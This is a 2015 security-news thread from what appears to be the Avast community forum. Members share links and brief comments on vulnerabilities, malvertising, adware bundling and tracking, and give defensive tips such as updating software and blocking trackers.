https://www.trustwave.com/Resources/SpiderLabs-Blog/Attackers-concealing-malicious-macros-in-XML-files/ article posted By Rodel Mendrez
polonus
-
A Week in Security (Mar 01 – 07)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-mar-01-07/?utm_source=Gplus&utm_medium=social
-
Various online website security scanners run on outdated server software.
Zulu Zscaler has a problem: HTTP Server: Apache HTTP Server 2.2.14
Operating System: Ubuntu 10.04 LTS (Lucid Lynx)
Phusion Passenger Version: 3.0.11 (Outdated)
urlquery dot net has a problem: HTTP Server: Apache HTTP Server 2.2.22 (Outdated)
Operating System: Ubuntu 12.10 (Quantal Quetzal) (Unsupported)
PHP Version: 5.4.6-1ubuntu1.8 (Outdated)
DrWeb has a problem: HTTP Server: nginx 0.7.67 (Outdated)
evuln.com/tools/malware-scanner: HTTP Server: nginx 1.0.15 (Outdated)
Hey, who is working that IT there? Well, do you guys take your job seriously? ;D
polonus
-
You should still be cautious with Lenovo:
http://www.extremetech.com/computing/200731-not-so-superfish-al-lenovo-still-shipping-infected-systems-as-customers-grapple-with-removal
-
Hi ehmen,
It is very hard to quit as a habit, bundling junkware!
polonus
-
Hi ehmen,
It is very hard to quit as a habit, bundling junkware!
polonus
But it's easy to quit buying from junkware bundlers.
-
Excellent reply and advice ehmen. :)
-
Another online scanner website with a server update problem: http://scanurl.net/
HTTP Server: nginx 1.4.0 (Outdated)
The risk involved: So let’s add up the risks and hidden dangers of outdated technology:
Increased security threats and vulnerabilities
Hard drive failures leading to possible catastrophic data loss
Bit rot leading to data corruption
Software rot leading to instability, increased downtime, and loss of productivity
Loss of competitiveness
Lower IT flexibility
Limited responsiveness to the organization
Quote from Cole Humphreys in a Tweet on CLOUD INDUSTRY INSIGHTS.
polonus
-
Canary Watch oversight: https://canarywatch.org/
The use of Canary Watch alerts may get websites in a corner they do not wanna be in,
just my humble opinion.
polonus
-
Excellent reply and advice ehmen. :)
;)
-
If you thought you were safe from the FREAK attack on Windows computer, think again.
http://www.cnet.com/news/windows-vulnerable-to-freak-encryption-flaw-too/
-
ehmen is right, read here: http://thehackernews.com/2015/03/freak-openssl-vulnerability.html
link article author = Mohit Kumar
And a link to the freak testing tool: https://tools.keycdn.com/freak
polonus
-
Chrome users should make sure they have the newly released version 41 to be immune to the FREAK attack.
-
Another online scanner website with a server update problem: http://scanurl.net/
HTTP Server: nginx 1.4.0 (Outdated)
The risk involved: So let’s add up the risks and hidden dangers of outdated technology:
Increased security threats and vulnerabilities
Hard drive failures leading to possible catastrophic data loss
Bit rot leading to data corruption
Software rot leading to instability, increased downtime, and loss of productivity
Loss of competitiveness
Lower IT flexibility
Limited responsiveness to the organization
Quote from Cole Humphreys in a Tweet on CLOUD INDUSTRY INSIGHTS.
polonus
Pol,
Glad you are looking into this. [EDIT:] Scintillating work.
-
Exploiting the DRAM rowhammer bug to gain kernel privileges
http://googleprojectzero.blogspot.de/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
GOOGLERS’ EPIC HACK EXPLOITS HOW MEMORY LEAKS ELECTRICITY
http://www.wired.com/2015/03/google-hack-dram-memory-electric-leaks/
Cutting-edge hack gives super user status by exploiting DRAM weakness
http://arstechnica.com/security/2015/03/cutting-edge-hack-gives-super-user-status-by-exploiting-dram-weakness/
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426086487419-88181.png) Yet Another Cleaner, Yet Another Stealer:
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/ (https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/)
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426086487419-88181.png) Yet Another Cleaner, Yet Another Stealer:
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/ (https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/)
Shame on Elex do Brasil Participações Ltda Technology Inc. here in Brazil...
Alright, so it looks like Yet Another Cleaner is straight up stealing our detection database and modifying it for their own means. Based on the fact that they only detected a very small portion of the tons of malware we had both YAC and MBAM scan, their scanner apparently uses a slimmed down version of the one utilized by Malwarebytes Anti-Malware. We also know this because we actually analyzed a memory snapshot of their software in action.
-
One must hope he's not on the malwarenet:
http://www.computerweekly.com/feature/The-security-threats-of-technology-ubiquity
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426086487419-88181.png) Yet Another Cleaner, Yet Another Stealer:
https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/ (https://blog.malwarebytes.org/fraud-scam/2015/03/yet-another-cleaner-yet-another-stealer/)
You're a bit late Bob, Para-Noid beat you too it https://forum.avast.com/index.php?topic=52252.msg1192410
-
That's because Para-Noid got his info from the horses mouth which I obviously overlooked.
My info came from a third party. :)
-
‘Equation Group’ hackers tied to NSA after new Kaspersky Labs report surfaces
http://rt.com/usa/239933-equation-group-nsa-links-backsnarf/
New smoking gun further ties NSA to omnipotent “Equation Group” hackers
http://arstechnica.com/security/2015/03/new-smoking-gun-further-ties-nsa-to-omnipotent-equation-group-hackers/
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1426166716406-81848.png)
Panda antivirus labels itself as malware, then borks EVERYTHING – (http://www.theregister.co.uk/2015/03/11/panda_antivirus_update_self_pwn/)
Users are strongly advised not to restart their computer until a fix is available.
( It can happen at any company :'( )
-
for those interested in computer virus ;)
http://map.ipviking.com/
http://cybermap.kaspersky.com/
http://worldmap3.f-secure.com/
https://www.fireeye.com/cyber-map/threat-map.html
http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=16508&view=map
-
for those interested in computer virus ;)
http://map.ipviking.com/
http://cybermap.kaspersky.com/
http://worldmap3.f-secure.com/
Interesting.According to Kaspersky, Croatia is 99th most-attacked country.Pretty safe place.
-
Hi abruptum,
Probably because they apparently only have two bad URLs in Croatia. :o
AS Name: SBIS-AS AS for SBIS-AS
IPs allocated: 3895808
Blacklisted URLs: 2
and a lot of live and up malware ;D: http://support.clean-mx.de/clean-mx/viruses?as=AS7132
Example: http://urlquery.net/report.php?id=1425644727571
polonus
-
Facebook/Fraud Scam
https://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-leverages-multiple-cloud-services/?utm_source=facebook&utm_medium=social
-
Fake CS:GO Lounge Phishes Steam Creds, Drops Malware
https://blog.malwarebytes.org/fraud-scam/2015/03/fake-csgo-lounge-phishes-steam-creds-drops-malware/?utm_source=Gplus&utm_medium=social
Do you really want an Apple Watch that bad?
https://blog.malwarebytes.org/privacy-2/2015/03/apple-watch-giveaway-spam-clocks-in-on-twitter/?utm_source=Gplus&utm_medium=social
-
The majority of criminal botnet servers are being hosted in the USA (over 35%) with Taiwan as a good second (almost 15%). See this Trendmicro trendlabs report on C&C servers: http://blog.trendmicro.com/trendlabs-security-intelligence/investigating-and-detecting-command-and-control-servers/
Cryptolocker is by far the favorite Cybercrime malware from CRILOCK servers to-day.
polonus
-
Second time around: https://blog.malwarebytes.org/exploits-2/2015/03/jamieoliver-com-still-compromised-now-drops-digitally-signed-malware/ link article author = JÉRÔME SEGURA.
polonus
-
BSides Austin 2015 and Malware Analysis Training
https://blog.malwarebytes.org/intelligence/2015/03/bsides-austin-2015-and-malware-analysis-training/?utm_source=Gplus&utm_medium=social
-
just Bull**** .... or?
USB bomb http://gizmodo.com/this-shifty-usb-drive-is-rigged-to-fry-your-computer-1691026394
Translate http://kukuruku.co/hub/diy/usb-killer
Russian http://habrahabr.ru/post/251451/
-
just Bull**** .... or?
USB bomb http://gizmodo.com/this-shifty-usb-drive-is-rigged-to-fry-your-computer-1691026394 (http://gizmodo.com/this-shifty-usb-drive-is-rigged-to-fry-your-computer-1691026394)
Translate http://kukuruku.co/hub/diy/usb-killer (http://kukuruku.co/hub/diy/usb-killer)
Russian http://habrahabr.ru/post/251451/ (http://habrahabr.ru/post/251451/)
Why not get one and see if you can be #130 :)
-
Microsoft Security Advisory 3046310 - Improperly Issued Digital Certificates Could Allow Spoofing
https://technet.microsoft.com/en-us/library/security/3046310.aspx
-
A backup regimen is now even more vital
File infecting polymorphic crypto ransomware
http://www.v3.co.uk/v3-uk/news/2399602/hackers-developing-file-infecting-virlock-ransomware-with-resurrection-powers
-
“Cracked” Minecraft? PUP Installer
https://blog.malwarebytes.org/online-security/2015/03/cracked-minecraft-pup-installer/?utm_source=Gplus&utm_medium=social
50+ Internet Security Tips & Tricks from Top Experts
https://heimdalsecurity.com/blog/security-experts-roundup/
A Week in Security (Mar 08 – 14)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-mar-08-14/?utm_source=Gplus&utm_medium=social
-
50+ Internet Security Tips & Tricks from Top Experts
https://heimdalsecurity.com/blog/security-experts-roundup/ (https://heimdalsecurity.com/blog/security-experts-roundup/)
https://heimdalsecurity.com/blog/security-experts-roundup/#comment-1902836552 (https://heimdalsecurity.com/blog/security-experts-roundup/#comment-1902836552)
-
The Company Securing Your Internet Has Close Ties to Russian Spies
www.bloomberg.com/news/articles/2015-03-19/cybersecurity-kaspersky-has-close-ties-to-russian-spies
-
Hi Pondus,
Always present two sides of the coin.
That was the one side of the story,
here is the other and then let those that have read this all
just decide for themselves what they want to believe,
I think that is the only fair presentation:
http://eugene.kaspersky.com/2015/03/20/a-practical-guide-to-making-up-a-sensation/
Source Евге́ний Валенти́нович Каспе́рский's Official Blog
polonus
-
Once attacked one must defend one's honor and integrity.
-
Once attacked one must defend one's honor and integrity.
Sometimes defending your honor only results to more criticism. :(
-
Once attacked one must defend one's honor and integrity.
Sometimes defending your honor only results to more criticism. :(
How true.
-
Bank of America Phish Seeks Personal Data Bonanza
https://blog.malwarebytes.org/fraud-scam/2015/03/bank-of-america-phish-seeks-personal-data-bonanza/?utm_source=Gplus&utm_medium=social
Nuclear EK leverages recently patched Flash vulnerability
https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/?utm_source=Gplus&utm_medium=social
-
HTTPS-Everywhere, nice initiative, but is it overall secure? "Majority of Web sites currently only use HTTPS for logins or transactions where sensitive data is captured," the analyst Ang Poon Wei, stated.
"Trying to access a Web site that doesn't or partially supports HTTPS would generate different user experiences." Quotes taken from an article by Ellyne Phneah for ZDNet.
This is my experience also. For instance at https://www.on24.com that is trying to load scripts from non-verified sources and older weaker encryption. Even HTTPS-Everywhere green padlocked websites may have security issues the average user may not expect - encryption sequence delivered from the weak end up (misconfiguration),
weakened encryption because excluded from the more secure variety (export restrictions). Security header implementation eikther missing or full of warnings, check with Recx Security Analyser Extension, so often the unaware user is lulled into a sense of security while the online commercial and governmental tracking goes on. Remember we live in the Golden Age of Global Surveillance. My analysis experiments with SSL scanning in combination with Tracker tracker tool result analysis proofs the green padlock may often only present a "bleak or bleached" green ;D
An example for htxps://www.on24.com/ with Outdated Web Server Apache Found Vulnerabilities on Apache 2.2 Apache/2.2.26 See for yourselves attached and the security header status report here: http://www.webpagescreenshot.info/img/550eadaa52b736-52877506
polonus
-
Also users may wonder (what if the given situation is that insecure) what then will be our best means of protection?
Overall Avast protection in the first place naturally. Then inside a browser script blocking and third party access blocking with extensions like for the firefox browser NoScript and RequestPolicy and a decent Adblocker. i use uBlock because it also blocks unobtrusive (Google) ads by default.
For the Google Chrome and Sleipnir user the choice is even less complicated while the handling of the extensions is more user-friendly. A combination of SafeScript extension, HTTP Switchboard extension and uBlock or ABP in right configuration here is all you browser users need. Whenever you need more protection for whatever reason read further here: https://prism-break.org/en/
The site we have analyzed above uses a tracking script named Munchkin. Here is how Glen Lipka first employee and designer of marketo's metaphorically describes what the tracking script is supposed to do Marketo tracks visitors with a piece of JavaScript called Munchkin. It pays careful attention to each individual fish. It watches where every single fish swims and keeps track of every detail. This is because that fish is going to feed a salesperson one day and he/she will want to know where the fish has been and where it's going so that they can catch the fish effectively. We even score the fish to give the fisherman/salesperson the best chance of success.
The code is an equivalent of the better known Google Analytics. Marketo cookies the visitor first, then request a 1x1 transparent image from their servers with details of the visit in the parameters of the request. That's how it works all the time all of the time under the hood of your browser, folks.
polonus
-
Another example of such a HTTPS Everywhere website with mixed https/http content - could it be vulnerable to HTTPS Strip Exploits like SSL Strip by Moxie Morlinspike.
Find my tracker tracker report attached for https://www.magellanmodels.com/- do not open links directly into a browser - info provided for research purposes only.
polonus (volunteer website security analyst and website error-hunter)
P.S. Info on the Yotpo Embedded Widget here: http://blog.yotpo.com/2014/03/13/embedded-widget-complete-guide/
cdn6.bigcommerce.com is an analysis tracker
-
New bugs found in common encryption software OpenSSL
http://www.theage.com.au/it-pro/security-it/new-bugs-found-in-common-encryption-software-openssl-20150320-1m3vb9.html
-
China is a gigantic market. This must have been the reason that the number of phishing sites now have doubled and now totals 93.000, 40.00 of which had a backdoor :
http://www.chinadaily.com.cn/china/2015-03/20/content_19869243.htm (source: (Xinhua) China Authorities).
polonus
-
When is enough enough?
22 million PUP detections - http://blog.avira.com/potentially-unwanted-applications-2/
polonus
-
Flash-based SOP circumvention hole coming back to haunt us three years later, thousands of websites affected:
http://www.computerworld.com/article/2901313/flashbased-vulnerability-lingers-on-many-websites-three-years-later.html article author = Lucian Constantin
pol
-
Microsoft Petitions U.S. Government for Surveillance Reform
http://www.eweek.com/security/microsoft-petitions-u.s.-government-for-surveillance-reform.html (http://www.eweek.com/security/microsoft-petitions-u.s.-government-for-surveillance-reform.html)
Qualys Expands Its SSL/TLS Security Scanning Service
http://www.eweek.com/security/qualys-expands-its-ssltls-security-scanning-service.html (http://www.eweek.com/security/qualys-expands-its-ssltls-security-scanning-service.html)
-
Windows Defender Gets Zero Antivirus Protection Points in New Research
http://news.softpedia.com/news/Windows-Defender-Gets-Zero-Antivirus-Protection-Points-in-New-Research-476901.shtml
-
Thirteen year old hole in RC4 encryption algorithm now coming back to haunt us.
30% of TLS sessions still use it : http://investors.imperva.com/phoenix.zhtml?c=247116&p=irol-newsArticle&ID=2028880
Read from TheGoodlookingNerd (info credits go there): http://securityg33k.blogspot.nl/2013/12/ssltls-use-of-weak-rc4-cipher.html
One could test here: https://www.ssllabs.com/ssltest/analyze.html?d=
When you see RC4 Yes WEAK (more info) there is danger.
pol
-
Adult site Xtube compromised, serving exploits
https://blog.malwarebytes.org/exploits-2/2015/03/adult-site-xtube-serves-malware-via-neutrino-ek/?utm_source=Gplus&utm_medium=social
Steam Codes and Countdowns
https://blog.malwarebytes.org/privacy-2/2015/03/steam-codes-and-countdowns/?utm_source=Gplus&utm_medium=social
-
Almost no website is updating their existing JSQuery version. I have installed the DetectJQuery user script in Google Chrome via my Tampermonkey extension and it alerts for JQuery and the respective installed JQuery version when JQuery is detected to run on a particular website I visit with the Chrome browser. Folks, the average results can be termed as shocking - JQuery version is often the version installed at website creation, sometimes so obsolete and also often also that vulnerable (to script injection and XSS exploits). Read about another researcher that found out about this unholy security situation in January 2014 (and let me tell you the overall situation has not changed much): http://erlend.oftedal.no/blog/?blogid=140
I alerted for the consequences of this situation here: https://forum.avast.com/index.php?topic=168633.0
polonus (volunteer website security analyst and website error-hunter)
-
Ad-fraud malware hijacks router - inject ads via google analytics:
http://aralabs.com/blog/2015/03/25/ad-fraud-malware-hijacks-router-dns-injects-ads-via-google-analytics/
link article author = Sergei Frankoff
You could test whether you are vulnerable here: https://www.ismydnshijacked.com/
courtesy of F-Secure
D
-
Ad-fraud malware hijacks router - inject ads via google analytics:
http://aralabs.com/blog/2015/03/25/ad-fraud-malware-hijacks-router-dns-injects-ads-via-google-analytics/
link article author = Sergei Frankoff
You could test whether you are vulnerable here: https://www.ismydnshijacked.com/
courtesy of F-Secure
D
And that is why I have Ghostery set to block Google Analytics among others.
-
Hi Para-Noid,
And rightly so, these threats make more and more users seek to block trackers.
From my Tracker tracker results you could establish the constant flow of ad, analytic and widget tracking that goes on under the hood of the browser. Now when these are being hijacked by fraudulous cybercriminals and it is not blocked we're done for. You can paste website links and external links (up to a 100) here: https://tools.digitalmethods.net/beta/trackerTracker/ to get a report. See example attached.
polonus
-
Adware: Delivery Methods
https://blog.malwarebytes.org/security-threat/2015/03/adware-delivery-methods/?utm_source=Gplus&utm_medium=social
Well written to be easily understood.
-
Windows: Local WebDAV NTLM Reflection Elevation of Privilege
https://code.google.com/p/google-security-research/issues/detail?id=222
-
'Largest DDoS attack' in GitHub's history targets anticensorship projects
http://www.networkworld.com/article/2903317/microsoft-subnet/largest-ddos-attack-in-githubs-history-targets-anticensorship-projects.html
-
A Week in Security (Mar 23 – 27)
https://blog.malwarebytes.org/online-security/2015/03/a-week-in-security-mar-23-27/?utm_source=Gplus&utm_medium=social
-
Google bans 192 ad-injecting extensions from the browser because of ad-injecting malvertising:
http://www.pcworld.com/article/2904852/google-cracks-down-on-adinjecting-chrome-extensions.html
also read: http://googleonlinesecurity.blogspot.ro/2015/03/out-with-unwanted-ad-injectors.html
polonus
-
Google bans 192 ad-injecting extensions from the browser because of ad-injecting malvertising:
http://www.pcworld.com/article/2904852/google-cracks-down-on-adinjecting-chrome-extensions.html
also read: http://googleonlinesecurity.blogspot.ro/2015/03/out-with-unwanted-ad-injectors.html
polonus
They could do with starting looking at the stuff on the Google Play store ;D
-
They could also block developer mode being enable by the extensions as well
-
Yes, essexboy, they use Programmatic Injection
chrome.tabs.executeScript(null, {file: "content_script.js"});
-> https://developer.chrome.com/extensions/content_scripts
polonus
-
Keep Wordpress up-to-date!
https://blog.malwarebytes.org/exploits-2/2015/04/compromised-wordpress-sites-launch-drive-by-attacks-off-pirate-bay-clone/?utm_source=Gplus&utm_medium=social
Phony My Team Voice App Being Spread on Steam Chat
https://blog.malwarebytes.org/fraud-scam/2015/03/phony-my-team-voice-app-being-spread-on-steam-chat/?utm_source=Gplus&utm_medium=social
-
Do Not Track disabled by default in new browsers.
http://blogs.microsoft.com/on-the-issues/2015/04/03/an-update-on-microsofts-approach-to-do-not-track/
So whenever you do not want to be ad-tracked anymore it is up to you to change the settings.
It is better to block ad-tracking, widget tracking and analytical trackers,
because you would never know the adtracker will actually honor your DNT demand.
polonus
-
Dell system detect vulnerability
http://www.dell.com/support/article/us/en/19/SLN296576/EN
https://www.f-secure.com/weblog/archives/00002800.html
So if you have a Dell update now
-
Dell system detect vulnerability
http://www.dell.com/support/article/us/en/19/SLN296576/EN
https://www.f-secure.com/weblog/archives/00002800.html
So if you have a Dell update now
Here's some more...https://blog.malwarebytes.org/exploits-2/2015/04/dell-system-detect-vulnerability-now-classified-as-a-pup/?utm_source=Gplus&utm_medium=social
-
Running a Dell here but this is not a problem for me, first thing I did when I got the computer is uninstall anything related to Dell.
So no Dell System Detect here.
-
Dell system detect vulnerability
http://www.dell.com/support/article/us/en/19/SLN296576/EN
https://www.f-secure.com/weblog/archives/00002800.html
So if you have a Dell update now
Wow. Pretty scary one.
-
MBAM detects it as PUP now: https://blog.malwarebytes.org/exploits-2/2015/04/dell-system-detect-vulnerability-now-classified-as-a-pup/ link article author ADAM KUJAWA.
polonus
-
Running a Dell here but this is not a problem for me, first thing I did when I got the computer is uninstall anything related to Dell.
So no Dell System Detect here.
I have 4 Dell computers and none of them have Dell System Detect.
-
Hi -midnight,
You are a clever person to have taken your precautions regarding this ;)
Crap and junk have to go everywhere, so away with this fool's gold. 8)
Enjoy your Easter week-end.
polonus
-
Hi polonus,
Don't know about the clever part. :)
You enjoy your Easter weekend too.
-midnight
-
Google's Gmail SMTP SSL has expired (again):
http://seclists.org/nanog/2015/Apr/120
link posting from David Hubbard.
polonus
-
Just to motivate webmasters and other staff to do a better job -
The Hall of Shame for websites with WP CMS.
See these results, then start to tremble ;D
http://urlfind.org/?generator=wordpress%202
polonus (volunteer website security analyst and website error-hunter)
-
Malwarebytes joins the Online Trust Alliance
https://blog.malwarebytes.org/news/2015/04/malwarebytes-joins-the-online-trust-alliance/?utm_source=Gplus&utm_medium=social
-
ISIL Defacements Exploiting WordPress Vulnerabilities
http://www.ic3.gov/media/2015/150407-1.aspx
-
Only those with stolen cedrtificates threated by Heartbleed: http://blog.erratasec.com/2015/04/no-75-are-not-vulnerable-to-heartbleed.html
polonus
-
Steer Clear of .SCR Malware “Screenshots”
https://blog.malwarebytes.org/fraud-scam/2015/04/steer-clear-of-scr-malware-screenshots/?utm_source=Gplus&utm_medium=social
-
Beware: “Halifax Classic” Phishing Mail
https://blog.malwarebytes.org/fraud-scam/2015/04/beware-halifax-classic-phishing-mail/?utm_source=Gplus&utm_medium=social
-
China's Great Ddos Cannon: https://citizenlab.org/2015/04/chinas-great-cannon/
link article: : Bill Marczak, John Scott-Railton, Reports and Briefings
Maybe HTTPS Everywhere or a switch to https might not be such a bad idea after all.
polonus
-
A history lesson brought to you by the Nuclear exploit kit
https://blog.malwarebytes.org/exploits-2/2015/04/a-history-lesson-brought-to-you-by-the-nuclear-exploit-kit/?utm_source=Gplus&utm_medium=social
-
SPEAR - Redirect to SMB returns from 1997 haunting us after 18 years:
http://blog.cylance.com/redirect-to-smb
link article author = Brian Wallace
Be aware the problem has not been completely mitigated - tou might be at risk!
pol
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546
Windows Security Flaw Allows Hackers to Steal Your Usernames and Passwords
http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546 (http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546)
Windows Security Flaw Allows Hackers to Steal Your Usernames and Passwords
http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml (http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml)
Your link isn't opening in FF. ???
Must have been a momentary Website glitch....
-
I use google chrome. It opens fine. Try IE11 or IE12 if you are on Windows 10. I open up in IE11 it opens fine as well
-
Zombie Vulnerability Affects Every Version of Windows
http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546 (http://gizmodo.com/zombie-vulnerability-affects-every-version-of-windows-1697470546)
Windows Security Flaw Allows Hackers to Steal Your Usernames and Passwords
http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml (http://news.softpedia.com/news/Windows-Security-Flaw-Allows-Hackers-to-Steal-Your-Usernames-and-Passwords-478303.shtml)
"Among the vulnerable products are security products (AVG Antivirus Free, Norton Security Scan, Bitdefender Free, Comodo Antivirus), Microsoft’s IE, Windows Media Player, Excel 2010, productivity tools (Box Sync, TeamViewer) and developer tools (GitHub, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer)."
Avast isn't mentioned but an assurance from Avast would be appreciated. Thanks
-
Yeah really hope that an assurance from Avast will be much appreciated. I have my desktop Windows 7 SP1 installed with AVG Free 2015 and I will make sure to keep that updated along with other programs such as Adobe, IE, windows media player, and etc updated. Same goes to my laptop that is installed with Avast Free and where I always use avast forum from my laptop.
-
bob3160 perhaps you should report this to moderator so someone from avast team can read this.
-
bob3160 perhaps you should report this to moderator so someone from avast team can read this.
That was done as soon as I made my post. :)
-
bob3160 perhaps you should report this to moderator so someone from avast team can read this.
That was done as soon as I made my post. :)
Oh thanks heaps 8). Should be thanking me too. I am the one who posted it ;D
-
Booby-trapped Hugo Boss Advert Spreads Cryptowall Ransomware
https://blog.malwarebytes.org/malvertising-2/2015/04/booby-trapped-hugo-boss-advert-spreads-cryptowall-ransomware/?utm_source=Gplus&utm_medium=social
Real-Time Bidding and Malvertising: A Case Study
https://blog.malwarebytes.org/malvertising-2/2015/04/real-time-bidding-and-malvertising-a-case-study/?utm_source=Gplus&utm_medium=social
-
Too many dns-servers with misconfigurations. Read: https://www.us-cert.gov/ncas/alerts/TA15-103A
polonus
-
Microsoft Security Bulletin Summary for April 2015
https://technet.microsoft.com/library/security/ms15-apr
-
Microsoft Update, Java Update, and Flash player update. Don't forget to update
https://krebsonsecurity.com/2015/04/critical-updates-for-windows-flash-java/
-
Do Not Track: An Interactive Documentary Series
https://blog.malwarebytes.org/privacy-2/2015/04/do-not-track-an-interactive-documentary-series/?utm_source=Gplus&utm_medium=social
-
“Business Support Giveaway” 419 Scam
https://blog.malwarebytes.org/fraud-scam/2015/04/business-support-giveaway-419-scam/?utm_source=Gplus&utm_medium=social
-
Adware epidemic and what firefox plans to do to add-ons, only signed add-ons allowed: https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/
polonus
-
Critical Windows vulnerability affects at least 70 million websites:
http://news.netcraft.com/archives/2015/04/16/critical-windows-vulnerability-affects-at-least-70-million-websites.html link article author = Netcraft's Paul Mutton.
The vulnerability test for this: https://lab.xpaw.me/MS15-034/
Mind that in China there are an enormous amount of vulnerable MS servers! :o
polonus
-
Oracle does not comment on bundling Ask-toolbar
Ask-toolbar a very unwelcome guest that can be very persisitent.
Read: http://www.latimes.com/business/la-fi-lazarus-20150417-column.html
link article author = David Lazarus
polonus
-
Oracle does not comment on bundling Ask-toolbar
Ask-toolbar a very unwelcome guest that can be very persisitent.
Read: http://www.latimes.com/business/la-fi-lazarus-20150417-column.html (http://www.latimes.com/business/la-fi-lazarus-20150417-column.html)
link article author = David Lazarus
polonus
Install Unchecky (http://unchecky.com/), it will uncheck the authorization to install the Ask Toolbar
and prevent it from getting to your computer.
Always use a custom install and read before you click on that Big Button.
-
Good Advice, bob3160, unchecky a must nowadays.
polonus
-
Beware of Chrome extensions, the mantra of the safest browser is now just cant (read the same for Firefox)
It seems that the adware creates a fake extension with other legit extension ID present in Google Chrome Web Store (only those are allowed in stable Chrome), which uses a manifest.json loading the ads script. I don't know, if an extension ID is picked randomly
e.g. CHR Extension: (bmejphbfclcpmpohkggcjeibfilpamia) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmejphbfclcpmpohkggcjeibfilpamia [2015-04-06]
Note that the ID itself is legit and refers to Netcraft Extension officially hosted on Chrome Web Store:
But that is NOT the Netcraft Extension, but a false copy:
I will not post the code as Avast alerts on it
The problem is with the amount of extensions people have on Chrome and Firefox it is impossible to check them all. So from now on if only "legitimate" ID appear in either browser I will be asking for an uninstall
Something similar is happening on Firefox
-
Flash EK Strikes Again via Google’s DoubleClick
https://blog.malwarebytes.org/malvertising-2/2015/04/flash-ek-strikes-again-via-googles-doubleclick/?utm_source=Gplus&utm_medium=social
Scammers Spam Steam’s Artwork Gallery
https://blog.malwarebytes.org/fraud-scam/2015/04/scammers-spam-steams-artwork-gallery/?utm_source=Gplus&utm_medium=social
-
Addition to my previous post http://it-supernova.com/new-adware-that-integrates-directly-into-the-browser/
-
Another Day, Another 419 Fakeout
https://blog.malwarebytes.org/fraud-scam/2015/04/another-day-another-419-fakeout/?utm_source=Gplus&utm_medium=social
-
Security through obscurity to win? Read: https://www.eff.org/deeplinks/2015/04/united-airlines-stops-researcher-who-tweeted-about-airplane-network-security link article author = ANDREW CROCKER
polonus
-
Interesting website on the European Privacy Debate -
How lobbyists weaken user's data protection for the Safe Harbor big data grabbers:
http://lobbyplag.eu/governments/
polonus
-
Do not continue using Java 7: http://www.infoworld.com/article/2909685/application-development/oracle-cutting-publicly-available-security-fixes-for-java-7-this-month.html link article author = Paul Krill.
Do not use Java when you do not need java, else update manually to Java 8.
Also consider the Ask toolbar that Java bundles, you might not like to have it on your OS!
polonus
-
"Also consider the Ask toolbar that Java bundles, you might not like to have it on your OS!"
If you've got Unchecky (http://unchecky.com/) installed, it will automatically uncheck the installation of the Ask Toolbar,
even if you happen to miss that nasty addition.
-
Steam Introduce Limited User Accounts
https://blog.malwarebytes.org/online-security/2015/04/steam-introduce-limited-user-accounts/?utm_source=Gplus&utm_medium=social
TeslaCrypt: Video game Safety 101
https://blog.malwarebytes.org/security-threat/2015/04/teslacrypt-videogame-safety-101/?utm_source=Gplus&utm_medium=social
Moral of the story...Be careful on which games you play online, especially MMORPG's.
-
Massive optional Microsoft Patch-Day Incoming
http://www.ghacks.net/2015/04/21/massive-optional-microsoft-patch-day-incoming/
-
Good to see Avast! Antivirus Free doing well and coming in third place
http://www.expertreviews.co.uk/software/internet-security/1403106/kaspersky-and-norton-top-latest-home-security-tests
:)
-
Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins
https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
-
Still Bleeding One Year Later—Heartbleed 2015 Research
https://www.venafi.com/blog/post/still-bleeding-one-year-laterheartbleed-2015-research
-
Failed Apple Rootpipe Fix Leaves Backdoor On All Macs, Researchers Claim
http://www.forbes.com/sites/thomasbrewster/2015/04/19/apple-fails-to-patch-rootpipe/
1,500 iOS apps have HTTPS-crippling bug. Is one of them on your device?
http://arstechnica.com/security/2015/04/1500-ios-apps-have-https-crippling-bug-is-one-of-them-on-your-device/
and i thought Mac`s was fault free ;D
-
Implimenting HTTPS Everywhere will make malvertisers harder to detect.
Also read: https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840
polonus
-
Implimenting HTTPS Everywhere will make malvertisers harder to detect.
Also read: https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840 (https://threatpost.com/ad-networks-ripe-for-abuse-via-malvertising/111840)
polonus
I remember when HTTPS Everywhere was all the rage. (It wasn't that long ago either.....)
-
Implimenting HTTPS Everywhere will make malvertisers harder to detect.
